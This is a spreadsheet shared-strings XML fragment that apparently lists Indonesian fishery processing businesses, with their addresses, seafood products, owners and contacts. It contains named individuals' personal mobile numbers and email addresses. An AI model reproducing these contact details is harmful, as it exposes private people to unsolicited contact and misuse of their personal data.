    <t>PT. DELTA PASIFIC INDOTUNA</t>
  </si>
  <si>
    <t>Jl. Veteran, Kel. Girian Bawah Lingkungan IV, Kec. Girian, Kota Bitung</t>
  </si>
  <si>
    <t>Tuna Pouch</t>
  </si>
  <si>
    <t>CHOLID A. BAWAZIR / FAISAL A. BAWAZIR</t>
  </si>
  <si>
    <t>Girian Bawah Lingkungan IV</t>
  </si>
  <si>
    <t>n.asyurah@yahoo.com</t>
  </si>
  <si>
    <t>0438-38270</t>
  </si>
  <si>
    <t>Ir. Abdul Khalid. MBA / Nur Asyurah 0813400563445/ 081244232969</t>
  </si>
  <si>
    <t xml:space="preserve">Ir. Abdul Khalid.MBA </t>
  </si>
  <si>
    <t>CV. MAHERA</t>
  </si>
  <si>
    <t>Dusun Pesisir RT 001 RW 001, Kel. Kaduara Timur, Kec. Pragaan, Kabupaten Sumenep</t>
  </si>
  <si>
    <t>Teri Nasi Kering</t>
  </si>
  <si>
    <t>BUDI SETIAWAN BUNTARAN</t>
  </si>
  <si>
    <t>Pragaan</t>
  </si>
  <si>
    <t>Kaduara Timur</t>
  </si>
  <si>
    <t>budisbuntaran@gmail.com</t>
  </si>
  <si>
    <t>0324-321147</t>
  </si>
  <si>
    <t>RAMLAN 082332958691</t>
  </si>
  <si>
    <t>Drs.AGUS SOEHARTO</t>
  </si>
  <si>
    <t>UD. MAJU JAYA</t>
  </si>
  <si>
    <t>Dusun Gempol RT 001 RW 004, Kel. Lampah, Kec. Kedamean, Kabupaten Gresik</t>
  </si>
  <si>
    <t>SITI RULIYAH</t>
  </si>
  <si>
    <t>Kedamean</t>
  </si>
  <si>
    <t>Lampah</t>
  </si>
  <si>
    <t>ruliahsiti31@gmail.com</t>
  </si>
  <si>
    <t>031 3890 238</t>
  </si>
  <si>
    <t>Endin. S Telp 0817 6014 869</t>
  </si>
  <si>
    <t>PT. FISHINDO LINTAS SAMUDRA</t>
  </si>
  <si>
    <t>Jl. Raya Margomulyo No.44, Suri Mulia Permai Blok NN No.01, Kel. Greges, Kec. Asemrowo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Bandeng Beku, Ikan Pelagis Beku, Udang Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Nanang Soengkono</t>
  </si>
  <si>
    <t>Greges</t>
  </si>
  <si>
    <t>septiyand.nugroho@gmail.com</t>
  </si>
  <si>
    <t>021-6685428</t>
  </si>
  <si>
    <t>NANAG SOENGKONO 08119988779</t>
  </si>
  <si>
    <t>UD. BINA MAKMUR</t>
  </si>
  <si>
    <t>Lingkungan Teleng RT 01 RW 11, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Abon Tuna</t>
  </si>
  <si>
    <t>MARSIYAH</t>
  </si>
  <si>
    <t>Pacitan</t>
  </si>
  <si>
    <t>Sidoharjo</t>
  </si>
  <si>
    <t>binamakmurpacitan@gmail.com</t>
  </si>
  <si>
    <t>MARSIYAH (082318075775)</t>
  </si>
  <si>
    <t>CV. PRIMA INDO TUNA</t>
  </si>
  <si>
    <t>Jl. Prof. Dr. Ir. Sutami No.32, Kel. Bira, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Segar, Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>AFIANTO AMIN</t>
  </si>
  <si>
    <t>luthfistp45@gmail.com</t>
  </si>
  <si>
    <t>0411-4720912</t>
  </si>
  <si>
    <t>JAYA SIMORANGKIR (081355836766)</t>
  </si>
  <si>
    <t>JAYA L SIMORANGKIR</t>
  </si>
  <si>
    <t>PT. MEGA CITRA KARYA</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No.1, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>ALEX HAMDANI</t>
  </si>
  <si>
    <t>ptmegacitrakarya@outlook.com</t>
  </si>
  <si>
    <t>082195013512 / 081342171111</t>
  </si>
  <si>
    <t>ALEX HAMDANI &amp; 081342171111</t>
  </si>
  <si>
    <t>PT. MAJU BERSAMA KARIB</t>
  </si>
  <si>
    <t>Jl. Cemara No.59, Kel. Bugul Lor, Kec. Panggungrejo, Kota Pasuruan</t>
  </si>
  <si>
    <t>Ahmad Jupri</t>
  </si>
  <si>
    <t>Panggungrejo</t>
  </si>
  <si>
    <t>Bugul Lor</t>
  </si>
  <si>
    <t>trohmawati@ptmbk.id</t>
  </si>
  <si>
    <t>0343-5630026</t>
  </si>
  <si>
    <t>Titin Rohmawati/085235636005</t>
  </si>
  <si>
    <t>PT. BERKAT RASA FAJARINDO</t>
  </si>
  <si>
    <t>Jl. Bisma Raya Blok D1 No.33, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Kerupuk Ikan</t>
  </si>
  <si>
    <t>Bambang Sawiran</t>
  </si>
  <si>
    <t>Papanggo</t>
  </si>
  <si>
    <t>blessyoubs@yahoo.co.id</t>
  </si>
  <si>
    <t>021-65308628</t>
  </si>
  <si>
    <t>Novi 08129157995</t>
  </si>
  <si>
    <t>CV. JALADRI FOOD</t>
  </si>
  <si>
    <t>Dusun Kedungaron RT 05 RW 02, Kel. Gajahbendo, Kec. Beji, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Udang Beku, Fillet Patin Beku</t>
  </si>
  <si>
    <t>NUR MOHAMMAD WAHYUDI</t>
  </si>
  <si>
    <t>Gajahbendo</t>
  </si>
  <si>
    <t>jaladrifood9@gmail.com</t>
  </si>
  <si>
    <t>YUDI 081357100856</t>
  </si>
  <si>
    <t>DWI PURWATI</t>
  </si>
  <si>
    <t>PT. VARIA NIAGA NUSANTARA</t>
  </si>
  <si>
    <t>Dusun Dermo, Desa Gunung Gangsir No.88, Kec. Beji, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ikan Demesal Beku, Cephalopoda Beku, Ikan Pelagis Beku, Tuna Beku, Ikan Hasil Budidaya Beku, Telur Ikan Terbang Beku, Telur Ikan Terbang Kering</t>
  </si>
  <si>
    <t>Iiwati Lowis</t>
  </si>
  <si>
    <t>Gunung Gangsir</t>
  </si>
  <si>
    <t>qc.dept@vaninus.com</t>
  </si>
  <si>
    <t>0343 655243</t>
  </si>
  <si>
    <t>Hastarini /081249642971</t>
  </si>
  <si>
    <t>Hariono Lowis</t>
  </si>
  <si>
    <t>UD. SAMA JAYA</t>
  </si>
  <si>
    <t>Jl. Puri Kompleks PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>Tuna Loin Beku, Fillet Ikan Beku, Ikan Pelagis Beku, Ikan Demesal Beku</t>
  </si>
  <si>
    <t>SUMADIONO</t>
  </si>
  <si>
    <t>sumadiono12031974@gmail.com</t>
  </si>
  <si>
    <t>SUMADIONO/081216332372</t>
  </si>
  <si>
    <t>IWA-QU</t>
  </si>
  <si>
    <t>Jl. Rd. Perang No.71 RT 009, Kel. Pematang Sulur, Kec. Telanaipura, Kota Jambi</t>
  </si>
  <si>
    <t>Kembang Goyang Udang, Stik Jagung Ikan, Stik Udang, Krispy Kulit dan Sirip Ikan Gabus, Kerupuk Tulang Ikan, Dendeng Ikan</t>
  </si>
  <si>
    <t>Ico Ordiana</t>
  </si>
  <si>
    <t>Telanaipura</t>
  </si>
  <si>
    <t>Pematang Sulur</t>
  </si>
  <si>
    <t>martianingsihtiadwi@gmail.com</t>
  </si>
  <si>
    <t>Ico Ordiana  085383223317</t>
  </si>
  <si>
    <t>PT. SUMATERA OCEAN TRANSINDO</t>
  </si>
  <si>
    <t>Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan</t>
  </si>
  <si>
    <t>Udang Segar, Ikan Pelagis Segar, Ikan Demersal Segar, Cephalopoda Segar, Rajungan Segar, Daging Kepiting Rebus Beku, Daging Kerang Beku, Ikan Kering, Cephalopoda Beku, Udang Beku, Lobster Air Tawar Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>pt.sot32@gmail.com</t>
  </si>
  <si>
    <t>HARTONOI 081396392387</t>
  </si>
  <si>
    <t>PT. SUMBER REJEKI BERKAH LAUTAN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Magepanda KM 10 RT 012 RW 004, Kel. Hewuli, Kec. Alok Barat, Kabupaten Sikka</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Tuna Beku, Tuna Segar, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>PURWANINGSIH</t>
  </si>
  <si>
    <t>Alok Barat</t>
  </si>
  <si>
    <t>Hewuli</t>
  </si>
  <si>
    <t>sumberr813@gmail.com</t>
  </si>
  <si>
    <t>0382-2426851</t>
  </si>
  <si>
    <t>YUSRA/081353569496</t>
  </si>
  <si>
    <t>PT. SUNRISE NIAGA FISHERY</t>
  </si>
  <si>
    <t>Dusun Dermo No.89, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ikan Demesal Beku, Cephalopoda Beku, Tuna Beku, Ikan Pelagis Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>Gusno Wijaya</t>
  </si>
  <si>
    <t>hariono@vaninus.com</t>
  </si>
  <si>
    <t>0343-655245</t>
  </si>
  <si>
    <t>UD. ANUGERAH</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami, Komplek Pergudangan Lantebung Blok A 11 No.9B, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Rumput Laut Kering, Sirip Hiu Kering, Teripang Kering, Gelembung Ikan Kering</t>
  </si>
  <si>
    <t>Lucy Harianto</t>
  </si>
  <si>
    <t>andioddangpero88@gmail.com</t>
  </si>
  <si>
    <t>lucy Harianto &amp; 08124161033</t>
  </si>
  <si>
    <t>CV. SLAMET WIDODO</t>
  </si>
  <si>
    <t>Jl. Kawasan Industri Terboyo Blok N1-H, Kel. Trimulyo, Kec. Genuk, Kota Semarang</t>
  </si>
  <si>
    <t>Fermentasi</t>
  </si>
  <si>
    <t>Terasi Udang</t>
  </si>
  <si>
    <t>HENDRATA GUNADI</t>
  </si>
  <si>
    <t>cv.slamet_widodo@yahoo.com</t>
  </si>
  <si>
    <t>024-6513181</t>
  </si>
  <si>
    <t>BOEN BING &amp; 085727497282 / A. WUWUH &amp; 081901916465</t>
  </si>
  <si>
    <t>WIDODO HIDAJAT</t>
  </si>
  <si>
    <t>CV. BINA USAHA</t>
  </si>
  <si>
    <t>Jl. Panglima Minal RT 02 RW 02, Kel. Senggoro, Kec. Bengkalis, Kabupaten Bengkalis</t>
  </si>
  <si>
    <t>Udang Segar, Ikan Pelagis Segar, Ikan Demersal Segar, Kerang Hidup, Kerang Segar, Ikan Air Tawar Segar</t>
  </si>
  <si>
    <t>SOFIANTO</t>
  </si>
  <si>
    <t>Bengkalis</t>
  </si>
  <si>
    <t>Senggoro</t>
  </si>
  <si>
    <t>binausaha148@gmail.com</t>
  </si>
  <si>
    <t>SOFIANTO,08116905678</t>
  </si>
  <si>
    <t>PT. MAYA FOOD INDUSTRIES</t>
  </si>
  <si>
    <t>Jl. Jlamprang Krapyak Lor Blok S Tembok RT 004 RW 002, Kel. Krapyak , Kec. Pekalongan Utara , Kota Pekalongan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Kerang Beku, Ikan Pelagis Beku, Ikan Demesal Beku</t>
  </si>
  <si>
    <t>WANG CHIAN PIN</t>
  </si>
  <si>
    <t xml:space="preserve">Pekalongan Utara </t>
  </si>
  <si>
    <t xml:space="preserve">Krapyak </t>
  </si>
  <si>
    <t>dcc_mfi@yahoo.com</t>
  </si>
  <si>
    <t>(0285) 421676</t>
  </si>
  <si>
    <t>RUKMANA RAHAYU LESTARI / 085642926649</t>
  </si>
  <si>
    <t>EKO SETYADI</t>
  </si>
  <si>
    <t>PT. PERIKANAN NUSANTARA (PERSERO) CABANG GORONTALO</t>
  </si>
  <si>
    <t>Jl. Botuliodu, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo</t>
  </si>
  <si>
    <t>Bandeng Beku, Ikan Pelagis Beku, Tuna Beku, Tuna Segar</t>
  </si>
  <si>
    <t>Dendi Anggi Gumilang</t>
  </si>
  <si>
    <t>Hulonthalangi</t>
  </si>
  <si>
    <t>upigorontalo.qa@gmail.com</t>
  </si>
  <si>
    <t>Richy 085298136457</t>
  </si>
  <si>
    <t>Sherly Lohonauman</t>
  </si>
  <si>
    <t>CV. BINTANG MAS SPORTINDO</t>
  </si>
  <si>
    <t>Jl. Homebes RT 01 RW 02, Kel. Batu Walenrang, Kec. Telluwanua, Kota Palopo</t>
  </si>
  <si>
    <t>HARMONY NAULI</t>
  </si>
  <si>
    <t>Telluwanua</t>
  </si>
  <si>
    <t>Batu Walenrang</t>
  </si>
  <si>
    <t>bintangmass@yahoo.com</t>
  </si>
  <si>
    <t>Reza &amp; 081355125500, Saifuddin &amp; 085299897655</t>
  </si>
  <si>
    <t>SAIFUDDIN</t>
  </si>
  <si>
    <t>PT. UNITY SAMUDRA INDONESIA</t>
  </si>
  <si>
    <t>Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung</t>
  </si>
  <si>
    <t>Udang Ronggeng Hidup, Kerapu Hidup, Lobster Hidup, Kepiting Hidup, Ikan Demersal Segar, Ikan Pelagis Segar, Kerang Hidup, Keong Hidup</t>
  </si>
  <si>
    <t>Lee Lee</t>
  </si>
  <si>
    <t>Benoa</t>
  </si>
  <si>
    <t>unitysamudra.indo@gmail.com</t>
  </si>
  <si>
    <t>0361-777292</t>
  </si>
  <si>
    <t>Maria Dwi Anintasari</t>
  </si>
  <si>
    <t>PT. EDMAR MANDIRI JAYA</t>
  </si>
  <si>
    <t>Pergudangan Safe N Lock Blok V 3128-3130, Jl Lingkar Timur Km 5,5, Kel. Rangkahkidul, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Hasil Budidaya Beku, Cephalopoda Beku, Ikan Demersal Beku, Udang Beku, Tuna Beku</t>
  </si>
  <si>
    <t>NICODEMUS HAPSIANTO</t>
  </si>
  <si>
    <t xml:space="preserve">Rangkahkidul </t>
  </si>
  <si>
    <t>edmarmandiri_qc01@yahoo.com</t>
  </si>
  <si>
    <t>031-99034683</t>
  </si>
  <si>
    <t>Finda 085648359780 Wita 082139844465</t>
  </si>
  <si>
    <t>PT. NAGA LAUT TIMUR</t>
  </si>
  <si>
    <t>Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Udang Beku, Scallop Beku, Lobster Beku, Hiu Beku, Rajungan Beku</t>
  </si>
  <si>
    <t>LIN WENPING</t>
  </si>
  <si>
    <t>ptnagalauttimur57@gmail.com</t>
  </si>
  <si>
    <t>LU XIANYE</t>
  </si>
  <si>
    <t>UD. JEMBATAN PURI</t>
  </si>
  <si>
    <t>Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Tuna Loin Beku</t>
  </si>
  <si>
    <t>djusinliusvia@gmail.com</t>
  </si>
  <si>
    <t>PT. ELITISM INTERNASIONAL PAPUA</t>
  </si>
  <si>
    <t>Jl. Utarum Kaki Air Kecil, Kel. Krooy, Kec. Kaimana, Kabupaten Kaimana</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku, Fillet Ikan Beku</t>
  </si>
  <si>
    <t>IRENE AMERBAY</t>
  </si>
  <si>
    <t>Kaimana</t>
  </si>
  <si>
    <t>Krooy</t>
  </si>
  <si>
    <t>pt.elitisminternasionalpapua@yahoo.com</t>
  </si>
  <si>
    <t>IRENE AMERBAY/082199570789</t>
  </si>
  <si>
    <t>KOPERASI USAHA MUDA MANDIRI KEPAHIANG</t>
  </si>
  <si>
    <t>Jl. Raya Bengko, Kel. Sukamerindu, Kec. Kepahiang, Kabupaten Kepahiang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Surimi Beku</t>
  </si>
  <si>
    <t>Firmansyah</t>
  </si>
  <si>
    <t>Kepahiang</t>
  </si>
  <si>
    <t>Suka Merindu</t>
  </si>
  <si>
    <t>mmkepahiang@gmail.com</t>
  </si>
  <si>
    <t>Firmansyah/08117312384</t>
  </si>
  <si>
    <t>UD. JANGKAR EMAS</t>
  </si>
  <si>
    <t>Tuna Loin Beku, Tuna Beku</t>
  </si>
  <si>
    <t>BUDI SULAIMAN</t>
  </si>
  <si>
    <t>jangkaremas.soq@gmail.com</t>
  </si>
  <si>
    <t>BUDI/081241043048</t>
  </si>
  <si>
    <t>CV. YN PUTRA</t>
  </si>
  <si>
    <t>Jl. Kalisolek RT 05 RW 03, Kel. Langenharjo, Kec. Juwana, Kabupaten Pati</t>
  </si>
  <si>
    <t>TI HARWI</t>
  </si>
  <si>
    <t>Langenharjo</t>
  </si>
  <si>
    <t>dwidaruma2@gmail.com</t>
  </si>
  <si>
    <t>Dwi 081228719595</t>
  </si>
  <si>
    <t>CV. PRAYOGA ADI SEJAHTERA</t>
  </si>
  <si>
    <t>Dusun Geneng RT 02 RW 04, Kel. Maron, Kec. Banyakan, Kabupaten Kediri</t>
  </si>
  <si>
    <t>Albumin</t>
  </si>
  <si>
    <t>ARI BASUKI</t>
  </si>
  <si>
    <t>Banyakan</t>
  </si>
  <si>
    <t>Maron</t>
  </si>
  <si>
    <t>prayogasejahtera@gmail.com</t>
  </si>
  <si>
    <t>Ari Basuki</t>
  </si>
  <si>
    <t>PT. ASSA JAKARTA</t>
  </si>
  <si>
    <t>Komplek Pergudangan Kosambi Permai Blok G No.15, Jl. Raya Perancis Dadap, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>M. Fadly Yudati P Pohan</t>
  </si>
  <si>
    <t>assa.jkt15@gmail.com</t>
  </si>
  <si>
    <t>(021) 5592694</t>
  </si>
  <si>
    <t>Ronald B Siagian 081288512541</t>
  </si>
  <si>
    <t>PT. INDO BAHARI LESTARI</t>
  </si>
  <si>
    <t>Pergudangan Kosambi Megah Jl. Raya Perancis Blok A14, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Udang Ronggeng Hidup, Kerapu Hidup, Lobster Hidup</t>
  </si>
  <si>
    <t>HADI KURNIAWAN</t>
  </si>
  <si>
    <t>indobaharilestari@gmail.com</t>
  </si>
  <si>
    <t>HADI / 085256017529</t>
  </si>
  <si>
    <t xml:space="preserve">HADI KURNIAWAN </t>
  </si>
  <si>
    <t>CV. SEMANGAT KAWAN SEJATI BARU</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto V No.6, Kel. Kaluku Bodoa, Kec. Tallo, Kota Makassar</t>
  </si>
  <si>
    <t>Tan Aldin R Theodorus</t>
  </si>
  <si>
    <t>Kaluku Bodoa</t>
  </si>
  <si>
    <t>aldinbogelz@gmail.com</t>
  </si>
  <si>
    <t>Aldin - 081213552209</t>
  </si>
  <si>
    <t>UD. FAMILY FOOD</t>
  </si>
  <si>
    <t>Ds Tenaru RT 11 RW 4, Kel. Tenaru, Kec. Driyorejo, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Ririn</t>
  </si>
  <si>
    <t>Tenaru</t>
  </si>
  <si>
    <t>family_food78@yahoo.co.id</t>
  </si>
  <si>
    <t>Ririn 081230552686</t>
  </si>
  <si>
    <t>CV. TATA NIAGA LESTARI</t>
  </si>
  <si>
    <t>Jl. TWK Abdul Aziz No.32, Kel. Merduati, Kec. Kuta Raja, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Tuna Loin Segar, Ikan Demersal Segar, Tuna Segar</t>
  </si>
  <si>
    <t>muhammad iqbal</t>
  </si>
  <si>
    <t>Kuta Raja</t>
  </si>
  <si>
    <t>Merduati</t>
  </si>
  <si>
    <t>iqbaljamil84@gmail.com</t>
  </si>
  <si>
    <t>PT. BLUE SEA INDUSTRY</t>
  </si>
  <si>
    <t>Jl. WR Supratman RT 01 RW 15, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kabupaten Pekalongan</t>
  </si>
  <si>
    <t>bluesea7092.team@gmial.com</t>
  </si>
  <si>
    <t>0285 423405</t>
  </si>
  <si>
    <t>NURTANTIO SONY PUTRO &amp; 0813 9199 8288</t>
  </si>
  <si>
    <t>PT. CELEBES MINAPRATAMA</t>
  </si>
  <si>
    <t>Jl. W. Mongisidi KM 5, Kel. Wangurer Timur LK 1 RT 05, Kec. Madidir, Kota Bitung</t>
  </si>
  <si>
    <t>Reduksi, Asap</t>
  </si>
  <si>
    <t>Ekstrak Air Rebusan Ikan, Tepung Ikan, Ikan Kayu</t>
  </si>
  <si>
    <t>ALBERT ODY WORANG</t>
  </si>
  <si>
    <t>Wangurer Timur LK 1 RT 05</t>
  </si>
  <si>
    <t>celebes_mp@yahoo.co.id</t>
  </si>
  <si>
    <t>ODRYATI NATOS 085255782067</t>
  </si>
  <si>
    <t>ROBIN TICOALU</t>
  </si>
  <si>
    <t>CV. MAJU MAKMUR SAMUDRA</t>
  </si>
  <si>
    <t>Pasar Ikan Blok I No.65-68 Pelabuhan Perikanan Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Mansyur</t>
  </si>
  <si>
    <t>majumakmursamudracv@gmail.com</t>
  </si>
  <si>
    <t>021 22661742</t>
  </si>
  <si>
    <t>Rizal 081384803007</t>
  </si>
  <si>
    <t>Andry</t>
  </si>
  <si>
    <t>UD. EKA TIRTA</t>
  </si>
  <si>
    <t>Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur</t>
  </si>
  <si>
    <t xml:space="preserve">Tuna Loin Beku, Tuna Loin Segar, Tuna Beku, Tuna Segar, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Fillet Ikan Beku </t>
  </si>
  <si>
    <t>H.M TAHIR</t>
  </si>
  <si>
    <t>eka@ekatirta.com</t>
  </si>
  <si>
    <t>H.M.TAHIR/082339065929</t>
  </si>
  <si>
    <t>PT. MITRA KARTIKA SEJATI</t>
  </si>
  <si>
    <t>Jl. Kima Raya I Kav D-1B, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>SUSAN TANGKUNEI</t>
  </si>
  <si>
    <t>qa.mikase@gmail.com</t>
  </si>
  <si>
    <t>0411-514515, 0411-515430</t>
  </si>
  <si>
    <t>SUHRIAYATI. MN 085298863956 / 081247213667</t>
  </si>
  <si>
    <t>PT. DWI BINA UTAMA</t>
  </si>
  <si>
    <t>Jl. Bubara, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>NOBUYUKI SASAKI</t>
  </si>
  <si>
    <t>mokobinama@gmail.com</t>
  </si>
  <si>
    <t>ACHMAD BAIQUNI</t>
  </si>
  <si>
    <t>TRI ANTORO</t>
  </si>
  <si>
    <t>UD. BERKAH LAIPUU</t>
  </si>
  <si>
    <t>Lingkungan I RT 003 RW 001, Kel. Pinangunian, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>Kitti Kristanti</t>
  </si>
  <si>
    <t>Pinangunian</t>
  </si>
  <si>
    <t>kittkris124712@gmail.com</t>
  </si>
  <si>
    <t>081281961919 kitti kristanti</t>
  </si>
  <si>
    <t>CV. MULTI SARANA JAYA</t>
  </si>
  <si>
    <t>Jl. Emboen Suryana, Kel. Sambutan, Kec. Samarinda Ilir, Kota Samarinda</t>
  </si>
  <si>
    <t>Samuel Kurniawan, ANG</t>
  </si>
  <si>
    <t>Samarinda Ilir</t>
  </si>
  <si>
    <t>Sambutan</t>
  </si>
  <si>
    <t>samuelmultisaranajaya@gmail.com</t>
  </si>
  <si>
    <t>Samuel Kurniawan/08125505538</t>
  </si>
  <si>
    <t>PT. KUSUMA KAISAN</t>
  </si>
  <si>
    <t>Jl. Lintang Raya Kav E-5, Kawasan Industri Sentul, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Kerang Beku, Teri Kering, Telur Ikan Terbang Kering, Telur Ikan Terbang Beku, Ubur-ubur Kering</t>
  </si>
  <si>
    <t>PAULUS KUSUMA</t>
  </si>
  <si>
    <t>kusumakaisan@yahoo.co.jp</t>
  </si>
  <si>
    <t>RUDY PRADITYA  081280802245</t>
  </si>
  <si>
    <t>RUDY PRADITYA</t>
  </si>
  <si>
    <t>PT. PUTRI GUMILANG SEJAHTERA</t>
  </si>
  <si>
    <t>Jl Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>ISWATI</t>
  </si>
  <si>
    <t>Babat</t>
  </si>
  <si>
    <t>Gendong Kulon</t>
  </si>
  <si>
    <t>putrigumilangsejahtera@yahoo.com</t>
  </si>
  <si>
    <t>Hartanto 085645768448</t>
  </si>
  <si>
    <t>HARTANTO</t>
  </si>
  <si>
    <t>PT. WAHYU PUTRA BIMASAKTI</t>
  </si>
  <si>
    <t>Jl. Kima 10 Blok T No.2B, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Semi Refined Carrageenan, Alkali Treated Cottonii Chips</t>
  </si>
  <si>
    <t>ira_psychedlia55@yahoo.co.id</t>
  </si>
  <si>
    <t>Irene Tandililing 085269050558</t>
  </si>
  <si>
    <t>UD. ARSHAINDO</t>
  </si>
  <si>
    <t>Desa Tanggul Rejo RT 13 RW 03, Kec. Manyar, Kabupaten Gresik</t>
  </si>
  <si>
    <t>MASRUR</t>
  </si>
  <si>
    <t>Manyar</t>
  </si>
  <si>
    <t>Tanggul Rejo</t>
  </si>
  <si>
    <t>masrurm93@gmail.com</t>
  </si>
  <si>
    <t>Masrur 08123170670</t>
  </si>
  <si>
    <t>PT. LAUTAN JAYA SEKAWAN</t>
  </si>
  <si>
    <t>Jl. Raya Bitung Manado, Kel. Sagerat, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>RICO FARDIAN</t>
  </si>
  <si>
    <t>Sagerat</t>
  </si>
  <si>
    <t>lautanjayasekawan2@gmail.com</t>
  </si>
  <si>
    <t>Rico 081803272214</t>
  </si>
  <si>
    <t>RICO FARDIAN 081803272214</t>
  </si>
  <si>
    <t>PT. ALAM BARU REKOR</t>
  </si>
  <si>
    <t>Jl. Raya Sagerat, Kel. Sagerat, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>TIFFANY HALIM</t>
  </si>
  <si>
    <t>albakor2019@gmail.com</t>
  </si>
  <si>
    <t>Zen 081232342055</t>
  </si>
  <si>
    <t>TIFFANY HALIM/ Zen 081232342055</t>
  </si>
  <si>
    <t>PT. FRESH ON TIME SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Kaleng, Segar, Beku, Lainnya</t>
  </si>
  <si>
    <t>Daging Rajungan Sterilisasi Kaleng, Tuna Segar, Udang Beku, Gurita Potong Rebus Beku, Daging Udang Sterilisasi Kaleng, Udang Bernilai Tambah Beku, Kepiting Bernilai Tambah Beku, Tuna Beku, Ikan Demersal Beku, Daging Rajungan Pasteurisasi Beku, Ikan Pelagis Beku, Kepiting Kulit Lunak Beku, Kepiting Beku, Cephalopoda Beku, Daging Rajungan Pasteurisasi, Salmon Beku</t>
  </si>
  <si>
    <t>BUDI SATRIA TARDY</t>
  </si>
  <si>
    <t>qms.fots@gmail.com</t>
  </si>
  <si>
    <t>021-8233817, 021-8233806</t>
  </si>
  <si>
    <t>Siti Marliana &amp; 085214543173</t>
  </si>
  <si>
    <t>SULIANA</t>
  </si>
  <si>
    <t>Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Udang Beku, Lobster Beku, Kerang Beku, Udang Pasteurisasi Pouch, Tuna Beku, Tuna Segar, Ikan Hasil Budidaya Beku, Surimi Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>thokrafi@gmail.com</t>
  </si>
  <si>
    <t>024-6716482</t>
  </si>
  <si>
    <t>PT. ADIB GLOBAL FOOD SUPPLIES</t>
  </si>
  <si>
    <t>Balai Layanan Usaha Produksi Perikanan Budidaya (BLUPPB) Karawang, Kel. Pusakajaya Utara, Kec. Cilebar, Kabupaten Karawang</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>BUDI MULYONO</t>
  </si>
  <si>
    <t>Cilebar</t>
  </si>
  <si>
    <t>Pusakajaya Utara</t>
  </si>
  <si>
    <t>canciojuly@gmail.com</t>
  </si>
  <si>
    <t>Cancio Noronha &amp; 08122666698</t>
  </si>
  <si>
    <t>Sumitra</t>
  </si>
  <si>
    <t>PT. AGB PALABUHANRATU</t>
  </si>
